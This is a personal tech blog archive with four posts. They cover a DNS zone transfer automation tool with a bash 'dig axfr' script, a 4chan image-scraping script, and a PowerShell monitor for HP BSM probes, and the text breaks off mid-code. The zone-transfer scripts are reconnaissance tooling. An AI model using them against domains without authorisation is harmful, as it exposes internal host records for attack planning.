Wednesday, April 9, 2014

Blog has been moved

Hey.

I'm moving my blog to another site. Please go to http://wondershell.wordpress.com/ for the newest posts.

Cheers.

Tuesday, April 8, 2014

Mèdved - web-based DNS zone transfer automation

Entry moved here: http://wondershell.wordpress.com/2014/04/09/medved-web-based-dns-zone-transfer-automation/



It's been a while since my last post, so today I have something bigger and, most probably, more useful than usual. [Download link at the bottom]

I present to you Mèdved (the name means "bear" in Serbian). It is part of a suite of tools I'm creating, hence the main directory is named carnivores.
This is a web-based tool designed to automate the search for DNS zone transfers. It has an intuitive interface and a few helpful shortcuts. As input it expects a domain or a list of domains. Ideally the list should be comma-separated, but it will handle space- or CR-LF-separated lists as well. Aside from the normal results, it gives you a log of performed searches, and all successful transfers are archived.

Requirements:
Linux + Apache2
path to medved.php: /var/www/carnivores/medved/medved.php (simply extract the archive to /var/www/)

There are some requirements for the directory structure and permissions, so here is how the tree should look:





Below is the first page with help toggled.




It has been implemented with responsive design, so you can use it on your smartphone or tablet, although the interface becomes slightly denser:




You can supply the list as domain.com, domain2.com, domain3.com.
If you have a list looking like this: domain.com domain2.com domain3.com
or like this:

domain.com 
domain2.com 
domain3.com

you can paste it as well; just use the Spaces to commas button before clicking the Analyze button, and the list will be corrected to the expected form. If you have a list of URLs instead of domains, use the Sanitize URLs button and it will strip all the unnecessary parts from each URL.
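If you would rather normalize the list in the shell before pasting it, the button behaviour is easy to approximate (a sketch; the exact transformations Mèdved applies may differ):

```shell
# "Spaces to commas": turn a space/CR-LF separated list into a comma-separated one
printf 'domain.com domain2.com\ndomain3.com\n' | tr -s ' \r\n' ',' | sed 's/,$//'
# -> domain.com,domain2.com,domain3.com

# "Sanitize URLs": strip scheme, path and query, leaving the bare hostname
echo 'https://example.com/some/path?q=1' | sed -E 's#^[a-z]+://##; s#[/?].*$##'
# -> example.com
```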

This and more about the available functions and shortcuts is described in the help.

Let's see how it works with an example:




As you can see, the transfer for Microsoft is actively refused. Each tested NS server has a separate tab. The warning sign shown for another domain (which I removed from the picture) indicates that the server does not accept TCP connections. The OK sign for one of the servers indicates a successful transfer.

It is common to frequently test the same domain after some time, to see if new records have been added or if the server configuration has been corrected. That is why all the successful transfers are saved in the archive. An archive is a simple list of available transfer results. 






You can filter the results to show a particular domain only by clicking on a domain name. The list shows the date of the transfer, the records discovered, and a link to review the transfer data. If more than one server responded with transfer data for a particular domain, the number of records shown is the sum from all the servers.
This might give you the false impression that you got 1000 records in the transfer when in fact you received 500 records, but from two servers.

If you need unique records, just save the file and use the command

sort -u records.txt
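Note that sort -u also reorders the records. If you want duplicates removed while keeping the original record order, a common awk idiom does that (a sketch on inline sample data):

```shell
# Keep only the first occurrence of each line, preserving order
printf 'www A 1.2.3.4\nmail A 1.2.3.5\nwww A 1.2.3.4\n' | awk '!seen[$0]++'
# -> www A 1.2.3.4
# -> mail A 1.2.3.5
```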

I'm not going to post any code here, as it would be really tedious work. Instead you can download all of it using the link below.

Download from here.

As usual, I'm not responsible for how you use this tool. It is presented only as a proof of concept. You can use it, but you cannot distribute it without my knowledge and explicit consent.

I've used a code snippet from http://blog.stevenlevithan.com/archives/parseuri for URL parsing and shortcut.js file from http://www.openjs.com/scripts/events/keyboard_shortcuts/ for creating shortcuts.

Friday, August 23, 2013

DNS zone transfer script

Entry moved here: http://wondershell.wordpress.com/2014/04/09/dns-zone-transfer-script/

A script automating the discovery of name servers that allow zone transfers.
Nothing fancy, just making it easier.

The output:

The zone transfer:



#!/bin/bash
# Usage: ./zonetransfer.sh domain.com

domain="$1"
data=""
server=""

for dnsserver in $(host -t ns "$domain" | cut -d " " -f 4);
do
        # STRIP THE TRAILING DOT FROM THE NS NAME
        dns_server="${dnsserver%.}"
        zone_data=$(dig axfr "$domain" "@$dns_server")

        # CHECKING ZONE TRANSFER
        if echo "$zone_data" | grep -q "Transfer failed";
        then
                echo -e " Transfer \033[31mFAILURE\033[00m at $dns_server"
        else
                echo -e " Transfer \033[32mSUCCESS\033[00m at $dns_server"

                # REMEMBER LAST SUCCESSFUL
                data="$zone_data"
                server="$dns_server"
        fi

done

echo ""
echo " Use command: dig axfr $domain @$server"

# UNCOMMENT THIS IF YOU WANT ZONE DATA OUTPUT
# echo "$data"

Wednesday, August 21, 2013

4chan board /hr image downloader (image download manager)

Entry moved here: http://wondershell.wordpress.com/2014/04/09/4chan-board-hr-image-downloader/

Two decades ago, browsing the internet on a 56k modem was an agonizing experience whenever you encountered a webpage rich with pictures. They had to be compressed, and of course the compression was lossy.
Now you can download high-resolution pictures with the click of a button and wait only a couple of seconds for them to fully load. Bandwidth is not an issue anymore.
What IS the issue? Where to get really high-resolution pictures (above 1920x1080) on a specific and very narrow topic.
If you like (as I do) old medieval maps, NASA's best space pictures, landscape photos or old paintings that are hard to find in high resolution, and you will not feel offended by occasional nudity, then the /hr board at 4chan.org is the place for you. There you will find multiple collections of really amazing pictures compiled in single threads, just waiting for you to grab them. Yes, this is 4chan, famous for being lightly moderated and for anonymous postings. As warned, you might encounter some nudity, but I guess that is the price for top-notch pictures you would otherwise never have found.

The /hr board is a collection of threads containing posts with pictures. While I really like some of them, I'm not a patient person when it comes to downloading stuff manually by clicking on each and every one. Therefore, I've created a bash script that downloads all the pictures for me automatically. It is fairly simple and works in three phases: first it collects all the links to threads, second it parses those threads and isolates the links to images, and finally it downloads those images to the specified directory.


While it is capable of downloading at full speed, I've limited the parsing of webpages to 10000 B/s (curl) and the downloading of images to 200 kB/s (wget).

I think it's a matter of netiquette not to overload the 4chan servers.

Take a peek at how it looks when executed:
1. Collecting links to sub-pages

2. Collecting links to images

3. Downloading images

Function definitions are in a separate file below.

Without further ado, here it is:


dwm.sh
#!/bin/bash

 source myfunctions.sh

 ############################
 #        VARIABLES         #
 ############################

 today=`date +%d.%m.%y`
 time=`date +%H:%M:%S`
 cols=$(tput cols)
 lines=$(tput lines)
 download_counter=0;
 curltransfer="100000B"

 margin_offset=0;
 margin_text_offset=2;

 let top_box_t=0;
 let top_box_b=0+5;
 let top_box_l=0+$margin_offset;
 let top_box_r=$cols-$margin_offset;
 let top_box_width=$cols-$margin_offset-$margin_offset

 site="http://boards.4chan.org/hr/"

 if [[ ! -d "./$today" ]]; then mkdir "./$today"; fi
 if [[ ! -e ./4chan_download.log ]]; then touch ./4chan_download.log; fi

 tput civis
 clear



 draw_top_box;
 draw_bottom_box;
 scrap_links;

 if [[ -e links.4chan ]];
 then
        sort -u links.4chan | grep -v "board" | cut -d "#" -f 1 | sort -u > uniquelinks.4chan
        rm links.4chan
 fi

 scrap_images;

 sort -u images.4chan > uniqueimages.4chan
 rm images.4chan

 draw_panel;
 draw_headers;

 download_images;

 tput cup 20 0;

 tput cnorm
Functions are in a separate file.
myfunctions.sh
#!/bin/bash

check_image()
{
        echo "1:" $1
        echo "2:" $2
}

draw_headers()
{
        tput cup $(($top_box_t+2)) $(($top_box_l+2));
        echo -en "$EINS\033[1;30m\033[40m#\033[0m";
        tput cup $(($top_box_t+2)) $(($top_box_l+6));
        echo -en "$EINS\033[1;30m\033[40mFILE NAME\033[0m";
}

download_images()
{

        let scroll_lines=$lines-6
        top=4

        tput cup $top 0
        scrolled_lines=1;
        allfiles=`cat uniqueimages.4chan | wc -l`

        index=0

        for i in `cat uniqueimages.4chan`
        do

                filename=`echo $i | cut -d "/" -f 6`
                if [[ $((index%$scroll_lines)) -eq 0 ]];
                then
                        tput cup $top 0
                        for ((j=0; j<$scroll_lines; j++))
                        do
                                echo -e "$EINS\033[32m\033[40m                                                                          \033[0m";
                        done
                        tput cup $top 0
                fi

                echo -ne "\033[s"

                if [[ $index -lt 10 ]];
                then
                        echo -e "   $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                elif [[ $index -lt 100 && $index -gt 9 ]];
                then
                        echo -e "  $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                elif [[ $index -lt 1000 && $index -gt 99 ]];
                then
                        echo -e " $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                elif [[ $index -gt 999 ]];
                then
                        tput cup $top 0
                        for ((j=0; j<$scroll_lines; j++))
                        do
                                echo -e "$EINS\033[32m\033[40m                                                                          \033[0m";
                        done
                        tput cup $top 0
                        echo -ne "\033[s"
                        let index=1
                        echo -e "   $index  $EINS\033[30m\033[47mhttp:$i\033[0m"
                fi

                #DOWNLOADING HERE
                color=1
                size=0
                download_check=$(grep -c "$filename" ./4chan_download.log 2>/dev/null)
                if [[ $download_check -eq 0 ]];
                then
                        let color=1
                        wget -q --limit-rate=200k -P "./$today" http:$i
                        # RECORD THE DOWNLOAD SO RE-RUNS CAN SKIP IT
                        echo "$filename" >> ./4chan_download.log
                        size=$(ls -hls "./$today/$filename" | cut -d " " -f 6)
                        let download_counter=$download_counter+1
                else
                        let color=2
                fi

                echo -ne "\033[u"
                if [[ $index -lt 10 ]];
                then
                        echo -en "   $index  $EINS\033[m\033[40mhttp:$i\033[0m"
                        if [[ $color -eq 1 ]];
                        then
                                echo -e  "\t[$EINS\033[32m\033[40m+\033[0m]"
                        else
                                echo -e  "\t[$EINS\033[33m\033[40m*\033[0m]"
                        fi
                elif [[ $index -lt 100 && $index -gt 9 ]];
                then
                        echo -en "  $index  $EINS\033[m\033[40mhttp:$i\033[0m"
                        if [[ $color -eq 1 ]];
                        then
                                echo -e  "\t[$EINS\033[32m\033[40m+\033[0m]"
                        else
                                echo -e  "\t[$EINS\033[33m\033[40m*\033[0m]"
                        fi
                elif [[ $index -lt 1000 && $index -gt 99 ]];
                then
                        echo -en " $index  $EINS\033[m\033[40mhttp:$i\033[0m"
                        if [[ $color -eq 1 ]];
                        then
                                echo -e  "\t[$EINS\033[32m\033[40m+\033[0m]"
                        else
                                echo -e  "\t[$EINS\033[33m\033[40m*\033[0m]"
                        fi
                fi

                let index=$index+1

                echo -ne "\033[s";
                #draw_bottom_box;
                tput cup $top_box_t $(($top_box_l+20));
                echo -en "$EINS\033[30m\033[47mDOWNLOADED $download_counter/$allfiles\033[0m";
                echo -ne "\033[u";
        done
}

scrap_images()
{
 tput cup $(($top_box_t+5)) $(($top_box_l+1));
 echo -en "$EINS\033[1;30m\033[40mSCRAPING IMAGES\033[0m";
 tput cup $(($top_box_t+5)) $(($top_box_l+20));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 tput cup $(($top_box_t+5)) $(($top_box_l+36));
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";

 urls=`cat uniquelinks.4chan | wc -l`
 index=0;

 position=21
 for i in `cat uniquelinks.4chan`;
 do

        let index=$index+1
        tput cup $top_box_t $(($top_box_l+20));
        echo -en "$EINS\033[30m\033[47mSCRAPED $index/$urls\033[0m";

        #HERE GOES THE CODE FOR images/ SCRAPING
        let left=$position
        tput cup $(($top_box_t+5)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";

        curl -s --limit-rate 10000B http://boards.4chan.org/hr/$i | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' |  sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e  '/^$/ d' | grep "images" | uniq >> images.4chan

        let position=$position+1
        if [[ $position -eq 36 ]];
        then
                tput cup $(($top_box_t+5)) $(($top_box_l+36));
                echo -en "$EINS\033[1;30m\033[40m]\033[0m";
                let position=21;
                tput cup $(($top_box_t+5)) $((1+$position));
                echo -en "$EINS\033[1;30m\033[40m              \033[0m";
        fi

 done

#CLEAN PROGRESS BAR
 for i in {1..14};
 do
        let left=$((19+$i))
        tput cup $(($top_box_t+5)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m \033[0m";
 done

#MARK AS COMPLETE
 tput cup $(($top_box_t+5)) $(($top_box_l+20+14));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 echo -en "$EINS\033[32m\033[40m+\033[0m";
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";

#CLEAN COUNTER
 tput cup $top_box_t $(($top_box_l+20));
 echo -en "$EINS\033[30m\033[47m                                \033[0m";

}

scrap_links()
{
 if [[ -e links.4chan ]];
 then
        rm links.4chan;
 fi
 tput cup $(($top_box_t+4)) $(($top_box_l+1));
 echo -en "$EINS\033[1;30m\033[40mSCRAPING LINKS\033[0m";
 tput cup $(($top_box_t+4)) $(($top_box_l+20));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 tput cup $(($top_box_t+4)) $(($top_box_l+36));
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";

#CLEAN OUTPUT FILE
        if [[ -e links.4chan ]]; then rm links.4chan; fi

#SCRAPE THE FIRST PAGE
 curl -s  --limit-rate $curltransfer http://boards.4chan.org/hr/ | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' |  sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' | grep "res/" | sort -u >> links.4chan

#SCRAPE THE REST
 for i in {1..15};
 do
        let left=$((20+$i))
        tput cup $(($top_box_t+4)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";
        curl -s  --limit-rate $curltransfer http://boards.4chan.org/hr/$i | grep -o '<a .*href=.*>' | sed -e 's/<a /\n<a /g' |  sed -e 's/<a .*href=['"'"'"]//' -e 's/["'"'"'].*$//' -e '/^$/ d' | grep "res/" | sort -u  >> links.4chan
 done

#CLEAN PROGRESS BAR
 for i in {1..14};
 do
        let left=$((19+$i))
        tput cup $(($top_box_t+4)) $(($top_box_l+$left));
        echo -en "$EINS\033[1;30m\033[40m \033[0m";
 done

#MARK AS COMPLETE
 tput cup $(($top_box_t+4)) $(($top_box_l+20+14));
 echo -en "$EINS\033[1;30m\033[40m[\033[0m";
 echo -en "$EINS\033[32m\033[40m+\033[0m";
 echo -en "$EINS\033[1;30m\033[40m]\033[0m";
}


function draw_top_box()
{
 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $top_box_t $left;
        echo -en "$EINS\033[30m\033[47m \033[0m";
 done


 tput cup $top_box_t $(($top_box_l+2));
 echo -en "$EINS\033[30m\033[47mDWM v.1.0\033[0m";
 tput cup $top_box_t $(($cols-20));
 echo -en "$EINS\033[30m\033[47m$time | $today\033[0m";

 tput cup $lines 0;

}

function draw_bottom_box()
{
 tput cup $lines 0;
 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $lines $left;
        echo -en "$EINS\033[30m\033[47m \033[0m";
 done

 tput cup $lines 0;
 echo -en "$EINS\033[30m\033[47m  DOWNLOADED FILES: $download_counter\033[0m";
}

function draw_panel()
{
 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $(($top_box_t+1)) $left;
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";
 done

 for (( i=0; i<$top_box_width; i++ ))
 do
        let left=$top_box_l+$i;
        tput cup $(($top_box_t+3)) $left;
        echo -en "$EINS\033[1;30m\033[40m-\033[0m";
 done

 tput cup $(($top_box_t+2)) $top_box_l;
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";
 tput cup $(($top_box_t+2)) $top_box_r;
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";
 tput cup $(($top_box_t+2)) $(($top_box_l+4));
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";

 tput cup $(($top_box_t+1)) $top_box_l;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";
 tput cup $(($top_box_t+1)) $top_box_r;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+3)) $top_box_l;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";
 tput cup $(($top_box_t+3)) $top_box_r;
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+3)) $(($top_box_l+4));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+1)) $(($top_box_l+4));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+1)) $(($top_box_r-5));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+3)) $(($top_box_r-5));
 echo -en "$EINS\033[1;30m\033[40m+\033[0m";

 tput cup $(($top_box_t+2)) $(($top_box_r-5));
 echo -en "$EINS\033[1;30m\033[40m|\033[0m";

}
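The curl | grep | sed chain used in scrap_links and scrap_images is dense, so here is the same href-extraction pipeline run on a small inline document (a sketch; the real input comes from the board pages, whose markup may of course differ):

```shell
# Stand-in for a fragment of a board page
html='<a href="res/12345" class="t">thread</a> <a href="board">nav</a>'

echo "$html" |
  grep -o '<a .*href=.*>' |            # keep only the anchor region
  sed -e 's/<a /\n<a /g' |             # split: one anchor per line
  sed -e 's/<a .*href=["'"'"']//' -e 's/["'"'"'].*$//' -e '/^$/d' |  # isolate the href value
  grep "res/"                          # keep only links to threads
# -> res/12345
```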



Be aware that all scripts are run at your own risk, and while every script has been written with the intention of minimising the potential for unintended consequences, the owners, hosting providers and contributors cannot be held responsible for any misuse or script problems.

Sunday, May 12, 2013

HP BSM / HP BAC Business Process Monitor maintenance automation with powershell


For those of you who work with application performance monitoring or synthetic user experience monitoring, the name HP Business Availability Center (BAC - formerly known as Mercury Topaz) or HP Business Service Management (BSM - as it is called nowadays) might sound somewhat familiar. One of the features this suite includes is the Business Process Monitor (sometimes referred to as a probe). BPM is a piece of software capable of running recorded scripts, the execution of which is measured and reported back to the central server - BAC/BSM. This allows you to diagnose and narrow down the cause of performance drops, network bottlenecks or availability issues, both overall and from a specific BPM.

To make it clearer:
Let's say you have an application that is available to clients all over the world. You need to sustain availability and performance at the level specified in the SLA. You buy a BAC/BSM licence and install Business Process Monitors within your clients' network infrastructures. This allows you to track the performance of your application from multiple sites (cross-country or across the world). Scripts are commonly recorded with HP LoadRunner, deployed to BPMs and executed. The data reported by the Business Process Monitors to the central server can show you how long it took to access your application from a specific location, how long it took for your server to respond, how much time the SSL handshake consumed, what errors were encountered during script execution and what errors the end user saw when your application had issues. Overall a really, really great tool.

But... at some point, as the number of your applications increases, and with it the number of BPMs and maintained transactions (a transaction is a block of code within the script that contains particular actions - for example the authentication process, or a data submit to a web page - and is shown separately on the server side), you will face the inevitable problem of tracking how many BPMs still work, how many have been shut down accidentally (or intentionally) by your client, or which transactions are missing data and when they stopped reporting. Reviewing all the BPMs scattered across multiple transactions, multiple applications and multiple profiles (a profile is a group of applications or a group of scripts) is tedious and painfully boring. I had to review hundreds of transactions and hundreds of BPMs each month - trust me, there are better ways of spending half a day at work. Daily routine kills the joy in you, piece by piece.

Eventually, I had enough and decided to automate this process.
The purpose: to know when a particular Business Process Monitor stopped responding, and how long a particular transaction/script has gone without being executed or returning data.
The weapon of choice: PowerShell + the BSM OpenAPI.

The example output (as usual, sensitive data has been removed). The report covers the last three months. BPMs that failed more than two months ago are in magenta, more than a month ago in red, and more than a week ago in yellow.













Notice that you have to supply your own username and password in the URLs in the script.

The variable $strict set to 1 forces the script to report a Business Process Monitor as faulty only when it has stopped responding in all scripts/transactions deployed to it. If it is set to 0, the script will report the Business Process Monitor as faulty even if it stopped executing only one of the deployed scripts/transactions.
Both modes are useful in some cases.
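The date thresholds in the script are plain Unix-epoch arithmetic; for reference, the same computation in shell (a sketch mirroring the script's $now, $weekAgo and $monthAgo variables):

```shell
# Seconds since 1970-01-01, like Get-Date -UFormat %s in the script
now=$(date +%s)
week_ago=$((now - 60*60*24*7))     # 604800 seconds back
month_ago=$((now - 60*60*24*30))
echo $((now - week_ago))
# -> 604800
```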

Script:
#############################
# BPMs / PROBES MAINTENANCE

# VARIABLES
 $storageDir = "D:\Work\tmp"
 $strict = 1;
 # DATES IN SECONDS
 $now = [int][double]::Parse((Get-Date -UFormat %s))
 $weekAgo = [int]($now - (60*60*24*7))
 $monthAgo = [int] ($now - (60*60*24*30))
 $threeMonthsAgo = [int] ($now - (60*60*24*90))
 $origin = New-Object -Type DateTime -ArgumentList 1970, 1, 1, 0, 0, 0, 0
 
 # NUMBER OF MONTHS - HOW FAR AGO TO REACH FOR DATA [ SHOULD BE EITHER 1 OR 3 ]
 $numberOfMonths = 3
 
 # TRANSACTIONS ARRAY
 $faultyT = New-Object object[] 150
 $faultyTIndex = 0;
 
 # PROFILES TABLE
 $faultyP = New-Object object[] 6
 $faultyPIndex = 0;
 
 # PROBES TABLE
 $faultyPr = New-Object object[] 150
 $faultyPrIndex = 0;
 
 # EFFECTIVELY FOUR-DIMENSIONAL ARRAY OF 
 # PROFILES -> TRANSACTIONS -> PROBES -> [PROBE NAME][TIMESTAMP]
 $profileProbes = New-Object object[] 6
 
 # THREE-DIMENSIONAL ARRAY OF 
 # PROFILES -> TRANSACTIONS -> [TRANSACTION NAME][TIMESTAMP]
 $profiles = New-Object object[] 6
 
 # MANUALLY FILLED ARRAY OF PROFILE NAMES
 $profilesNames = New-Object object[] 6
 $profilesNames[0] = "A" 
 $profilesNames[1] = "B"
 $profilesNames[2] = "C"  
 $profilesNames[3] = "D"
 $profilesNames[4] = "E"
 $profilesNames[5] = "F" 

 
# FUNCTIONS
function downloadTransactions( [string]$profile )
{
  $webclient = New-Object System.Net.WebClient
  $url = "https://BAC.URL/gdeopenapi/GdeOpenApi?method=getData&user=XXX&password=XXX&query=SELECT DISTINCT szTransactionName as transaction, MAX(time_stamp) as time FROM trans_t WHERE profile_name='" + $profile + "' and time_stamp>" + $weekAgo + " &resultType=csv&customerID=1"
  $file = "$storageDir\" + $profile + ".csv"
  $webclient.DownloadFile($url,$file)
}
 
function downloadProbes( [string]$transaction )
{
  $webclient = New-Object System.Net.WebClient
  $url = "https://BAC.URL/gdeopenapi/GdeOpenApi?method=getData&user=XXX&password=XXX&query=SELECT DISTINCT szLocationName as probe, MAX(time_stamp) as time FROM trans_t WHERE szTransactionName='" + $transaction + "' and time_stamp>" + $monthAgo + " &resultType=csv&customerID=1"
  $file = "$storageDir\" + $transaction + ".csv"
  $webclient.DownloadFile($url,$file)
}
 
function downloadProbesQuaterly( [string]$transaction )
{
  $webclient = New-Object System.Net.WebClient
  $url = "https://BAC.URL/gdeopenapi/GdeOpenApi?method=getData&user=XXX&password=XXX&query=SELECT DISTINCT szLocationName as probe, MAX(time_stamp) as time FROM trans_t WHERE szTransactionName='" + $transaction + "' and time_stamp>" + $threeMonthsAgo + " &resultType=csv&customerID=1"
  $file = "$storageDir\" + $transaction + ".csv"
  $webclient.DownloadFile($url,$file)
}
 
function showFaultyProfiles()
{
  for ($i = 0; $i -lt $faultyP.Length; $i++)
  {
    if ( $faultyP[$i].Length -gt 1 )
    {
      Write-host "`t" $faultyP[$i]
    }
  }
}
 
function showFaultyTransactions()
{
 Write-host -foregroundcolor green "+---------------------+-----//------+";
 Write-host -foregroundcolor green "|  HOURS WITHOUT DATA | TRANSACTION |";
 Write-host -foregroundcolor green "+---------------------+-----//------+";
 for ($i = 0; $i -lt $faultyT.Length; $i++)
 {
   for ($j = 0; $j -lt $faultyT[$i].Length; $j=$j+2)
  {
   $size = 55;
   $tranName = [string]$faultyT[$i][$j]
   $spaces = [int]([int]$size - [int]$tranName.Length)
   for ($k = 0; $k -lt $spaces; $k++)
   {
    $tranName = " " + $tranName;
    }
   $size = 18;
   $tranTime = [string]$faultyT[$i][$j+1]
   $spaces = [int]([int]$size - [int]$tranTime.Length)
   for ($k = 0; $k -lt $spaces; $k++)
   {
    $tranTime = " " + $tranTime;
   }
   Write-host -foregroundcolor green "| " $tranTime "|"  $tranName "|"
   Write-host -foregroundcolor green "+---------------------+-----//----+";
   }
 }
}

function printRow ( [string]$dateString, [string]$diffString, 
   [string]$probeString, [string]$transactionString,  [string]$color ) 
{
  Write-host -nonewline -foregroundcolor green "| " 
  Write-host -nonewline -foregroundcolor $color $dateString
  Write-host -nonewline -foregroundcolor green " | "
  Write-host -nonewline -foregroundcolor $color $diffString
  Write-host -nonewline -foregroundcolor green " | "
  Write-host -nonewline -foregroundcolor $color $probeString
  Write-host -nonewline -foregroundcolor green " | "
  Write-host -nonewline -foregroundcolor $color $transactionString
  Write-host -foregroundcolor green " |" 
}

function drawLine()
{
  Write-host -foregroundcolor green "+--//--+--//--+--//--+--//--+";
}
function drawHeader()
{
  Write-host -foregroundcolor green "+--//--+--//--+--//--+--//--+";
  Write-host -foregroundcolor green "| LAST SEEN | HOURS LOST | PROBE | LAST TRANSACTION |";
  Write-host -foregroundcolor green "+--//--+--//--+--//--+--//--+";
}
 
# PROFILES 

Write-Host -nonewline -foregroundcolor green " COLLECTING PROFILE TRANSACTIONS `t-"
$progress = "-"
for ($i = 0; $i -lt $profilesNames.Length; $i++)
{ 
  downloadTransactions ([string]$profilesNames[$i])
  $file = $storageDir + "\" + $profilesNames[$i] + ".csv"
  $tmp = Import-Csv "$file" -header("transaction","time","o")
  $counter = 0;
  $tmp | ForEach-Object { 
        if ( $_.transaction -ne "transaction" -and
          $_.transaction -ne "" )
        { $counter++ } 
      }
  $transactions = New-Object object[] $counter
  $j = 0;
  $tmp | ForEach-Object {
    if ( $_.transaction -ne "transaction" -and 
          $_.transaction -ne "" -and 
          $_.transaction -ne "The data is empty" )
    { 
         $time = [int][double]::Parse(($_.time));
      $pair = New-Object object[] 2
      $pair[0] = $_.transaction;
      $pair[1] = $time
      $transactions[$j] = $pair
      $j++ 
    }
  }
  $profiles[$i] = $transactions
  if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
  if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
  if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
  if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
}
Write-host -foregroundcolor green "`b`b`tV"
Write-host -nonewline -foregroundcolor green " COLLECTING TRANSACTIONS' TIMESTAMPS `t-"
 
for ($i = 0; $i -lt $profiles.Length; $i++)
{
 for ($j = 0; $j -lt $profiles[$i].Length; $j++)
 {
   $diff = 0;
   if ( $profiles[$i][$j].Length -gt 0 ) 
   {
    # CALCULATE TIME SINCE LAST RESPONSE
    $diff = $now - [int][double]::Parse(($profiles[$i][$j][1]));
    
    # PARSE TO HOURS
    $diff = $diff / 60 / 60;
    
    # ROUNDING
    $diff = [int]$diff;
    
    if ( $diff -gt 25 )
    {
     $transaction = New-Object object[] 2
     $transaction[0] = $profiles[$i][$j][0];
     $transaction[1] = $diff;
     $faultyT[$faultyTIndex] = $transaction;
     $faultyTIndex++;
    }
   }
   else 
   { 
     $faultyP[$faultyPIndex] = $profilesNames[$i];
     $faultyPIndex++;
   }
   if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
   if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
   if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
   if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
 }
}

Write-host -foregroundcolor green "`b`b`tV"


Write-host -nonewline -foregroundcolor green " COLLECTING PROBES' TIMESTAMPS `t`t-"

for ($i = 0; $i -lt $profiles.Length; $i++)
{
  $transactionProbes = New-Object object[] 200
  for ($j = 0; $j -lt $profiles[$i].Length; $j++)
  {
   if ( $profiles[$i][$j] )
   {
    $transaction = $profiles[$i][$j][0].Replace('&', '%26')
    $transaction = $transaction.Replace('+', '%2B')
    if ( $numberOfMonths -eq 3 )
    {
     downloadProbesQuaterly ($transaction)
    }
    else
    {
     downloadProbes ($transaction)
    }
  
    $file = $storageDir + "\" + $transaction + ".csv"
    $tmp = Import-Csv "$file" -header("probe","time","o")
    $counter = 0;
    $tmp | ForEach-Object { 
           if ( $_.probe -ne "probe" -and $_.probe -ne "" )
           { $counter++; } 
         }
    $probes = New-Object object[] $counter
    $k = 0;
    $tmp | ForEach-Object { 
     if ( $_.probe -ne "probe" -and 
               $_.probe -ne "" -and 
               $_.probe -ne "The data is empty" )
     {
       $time = [int][double]::Parse(($_.time));
       $probe = New-Object object[] 2
       $probe[0] = $_.probe;
       $probe[1] = $time
       $probes[$k] = $probe
       $k++ 
     } 
    }
    $transactionProbes[$j] = $probes; 
   }
    if ($progress -eq "-") {Write-host -nonewline "`b\" ; $progress = "\"; continue}
    if ($progress -eq "\") {Write-host -nonewline "`b|"; $progress = "|";continue}
    if ($progress -eq "|") {Write-host -nonewline "`b/"; $progress = "/";continue}
    if ($progress -eq "/") {Write-host -nonewline "`b-"; $progress = "-";continue}
  }
  $profileProbes[$i] = $transactionProbes;
}

Write-host -foregroundcolor green "`b`b`tV"

Write-host -nonewline -foregroundcolor green " SANITIZING PROBES' TIMESTAMPS `t`t-"

for ($i = 0; $i -lt $profileProbes.Length; $i++)
{
  for ($j = 0; $j -lt $profileProbes[$i].Length; $j++)
  {
    $validation = 0;
     for ($b = 0; $b -lt $faultyT.Length; $b++)
     {
      if ($faultyT[$b])
      {
       if ($profiles[$i][$j])
       {
        if ( $faultyT[$b][0] -eq $profiles[$i][$j][0] )
        {
          $validation = 1
        }
       }
      }
     }
  
    if ($validation -eq 0)
    {
      for ($k = 0; $k -lt $profileProbes[$i][$j].Length; $k++)
      {
        # AGE OF THE PROBE'S LAST TIMESTAMP, IN FULL HOURS
        $diff = $now - [int][double]::Parse(($profileProbes[$i][$j][$k][1]))
        $diff = $diff / 60 / 60;
        $diff = [int]$diff;

        # OLDER THAN 25 HOURS - TREAT THE PROBE AS INACTIVE
        if ($diff -gt 25)
        {
          $containCheck = 0;
          for ($a = 0; $a -lt $faultyPr.Length; $a++)
          {
            if ( $faultyPr[$a] )
            {
              if ( $faultyPr[$a][0] -eq $profileProbes[$i][$j][$k][0] )
              {
                $containCheck = 1;
                # KEEP ONLY THE NEWEST TIMESTAMP SEEN FOR THIS PROBE
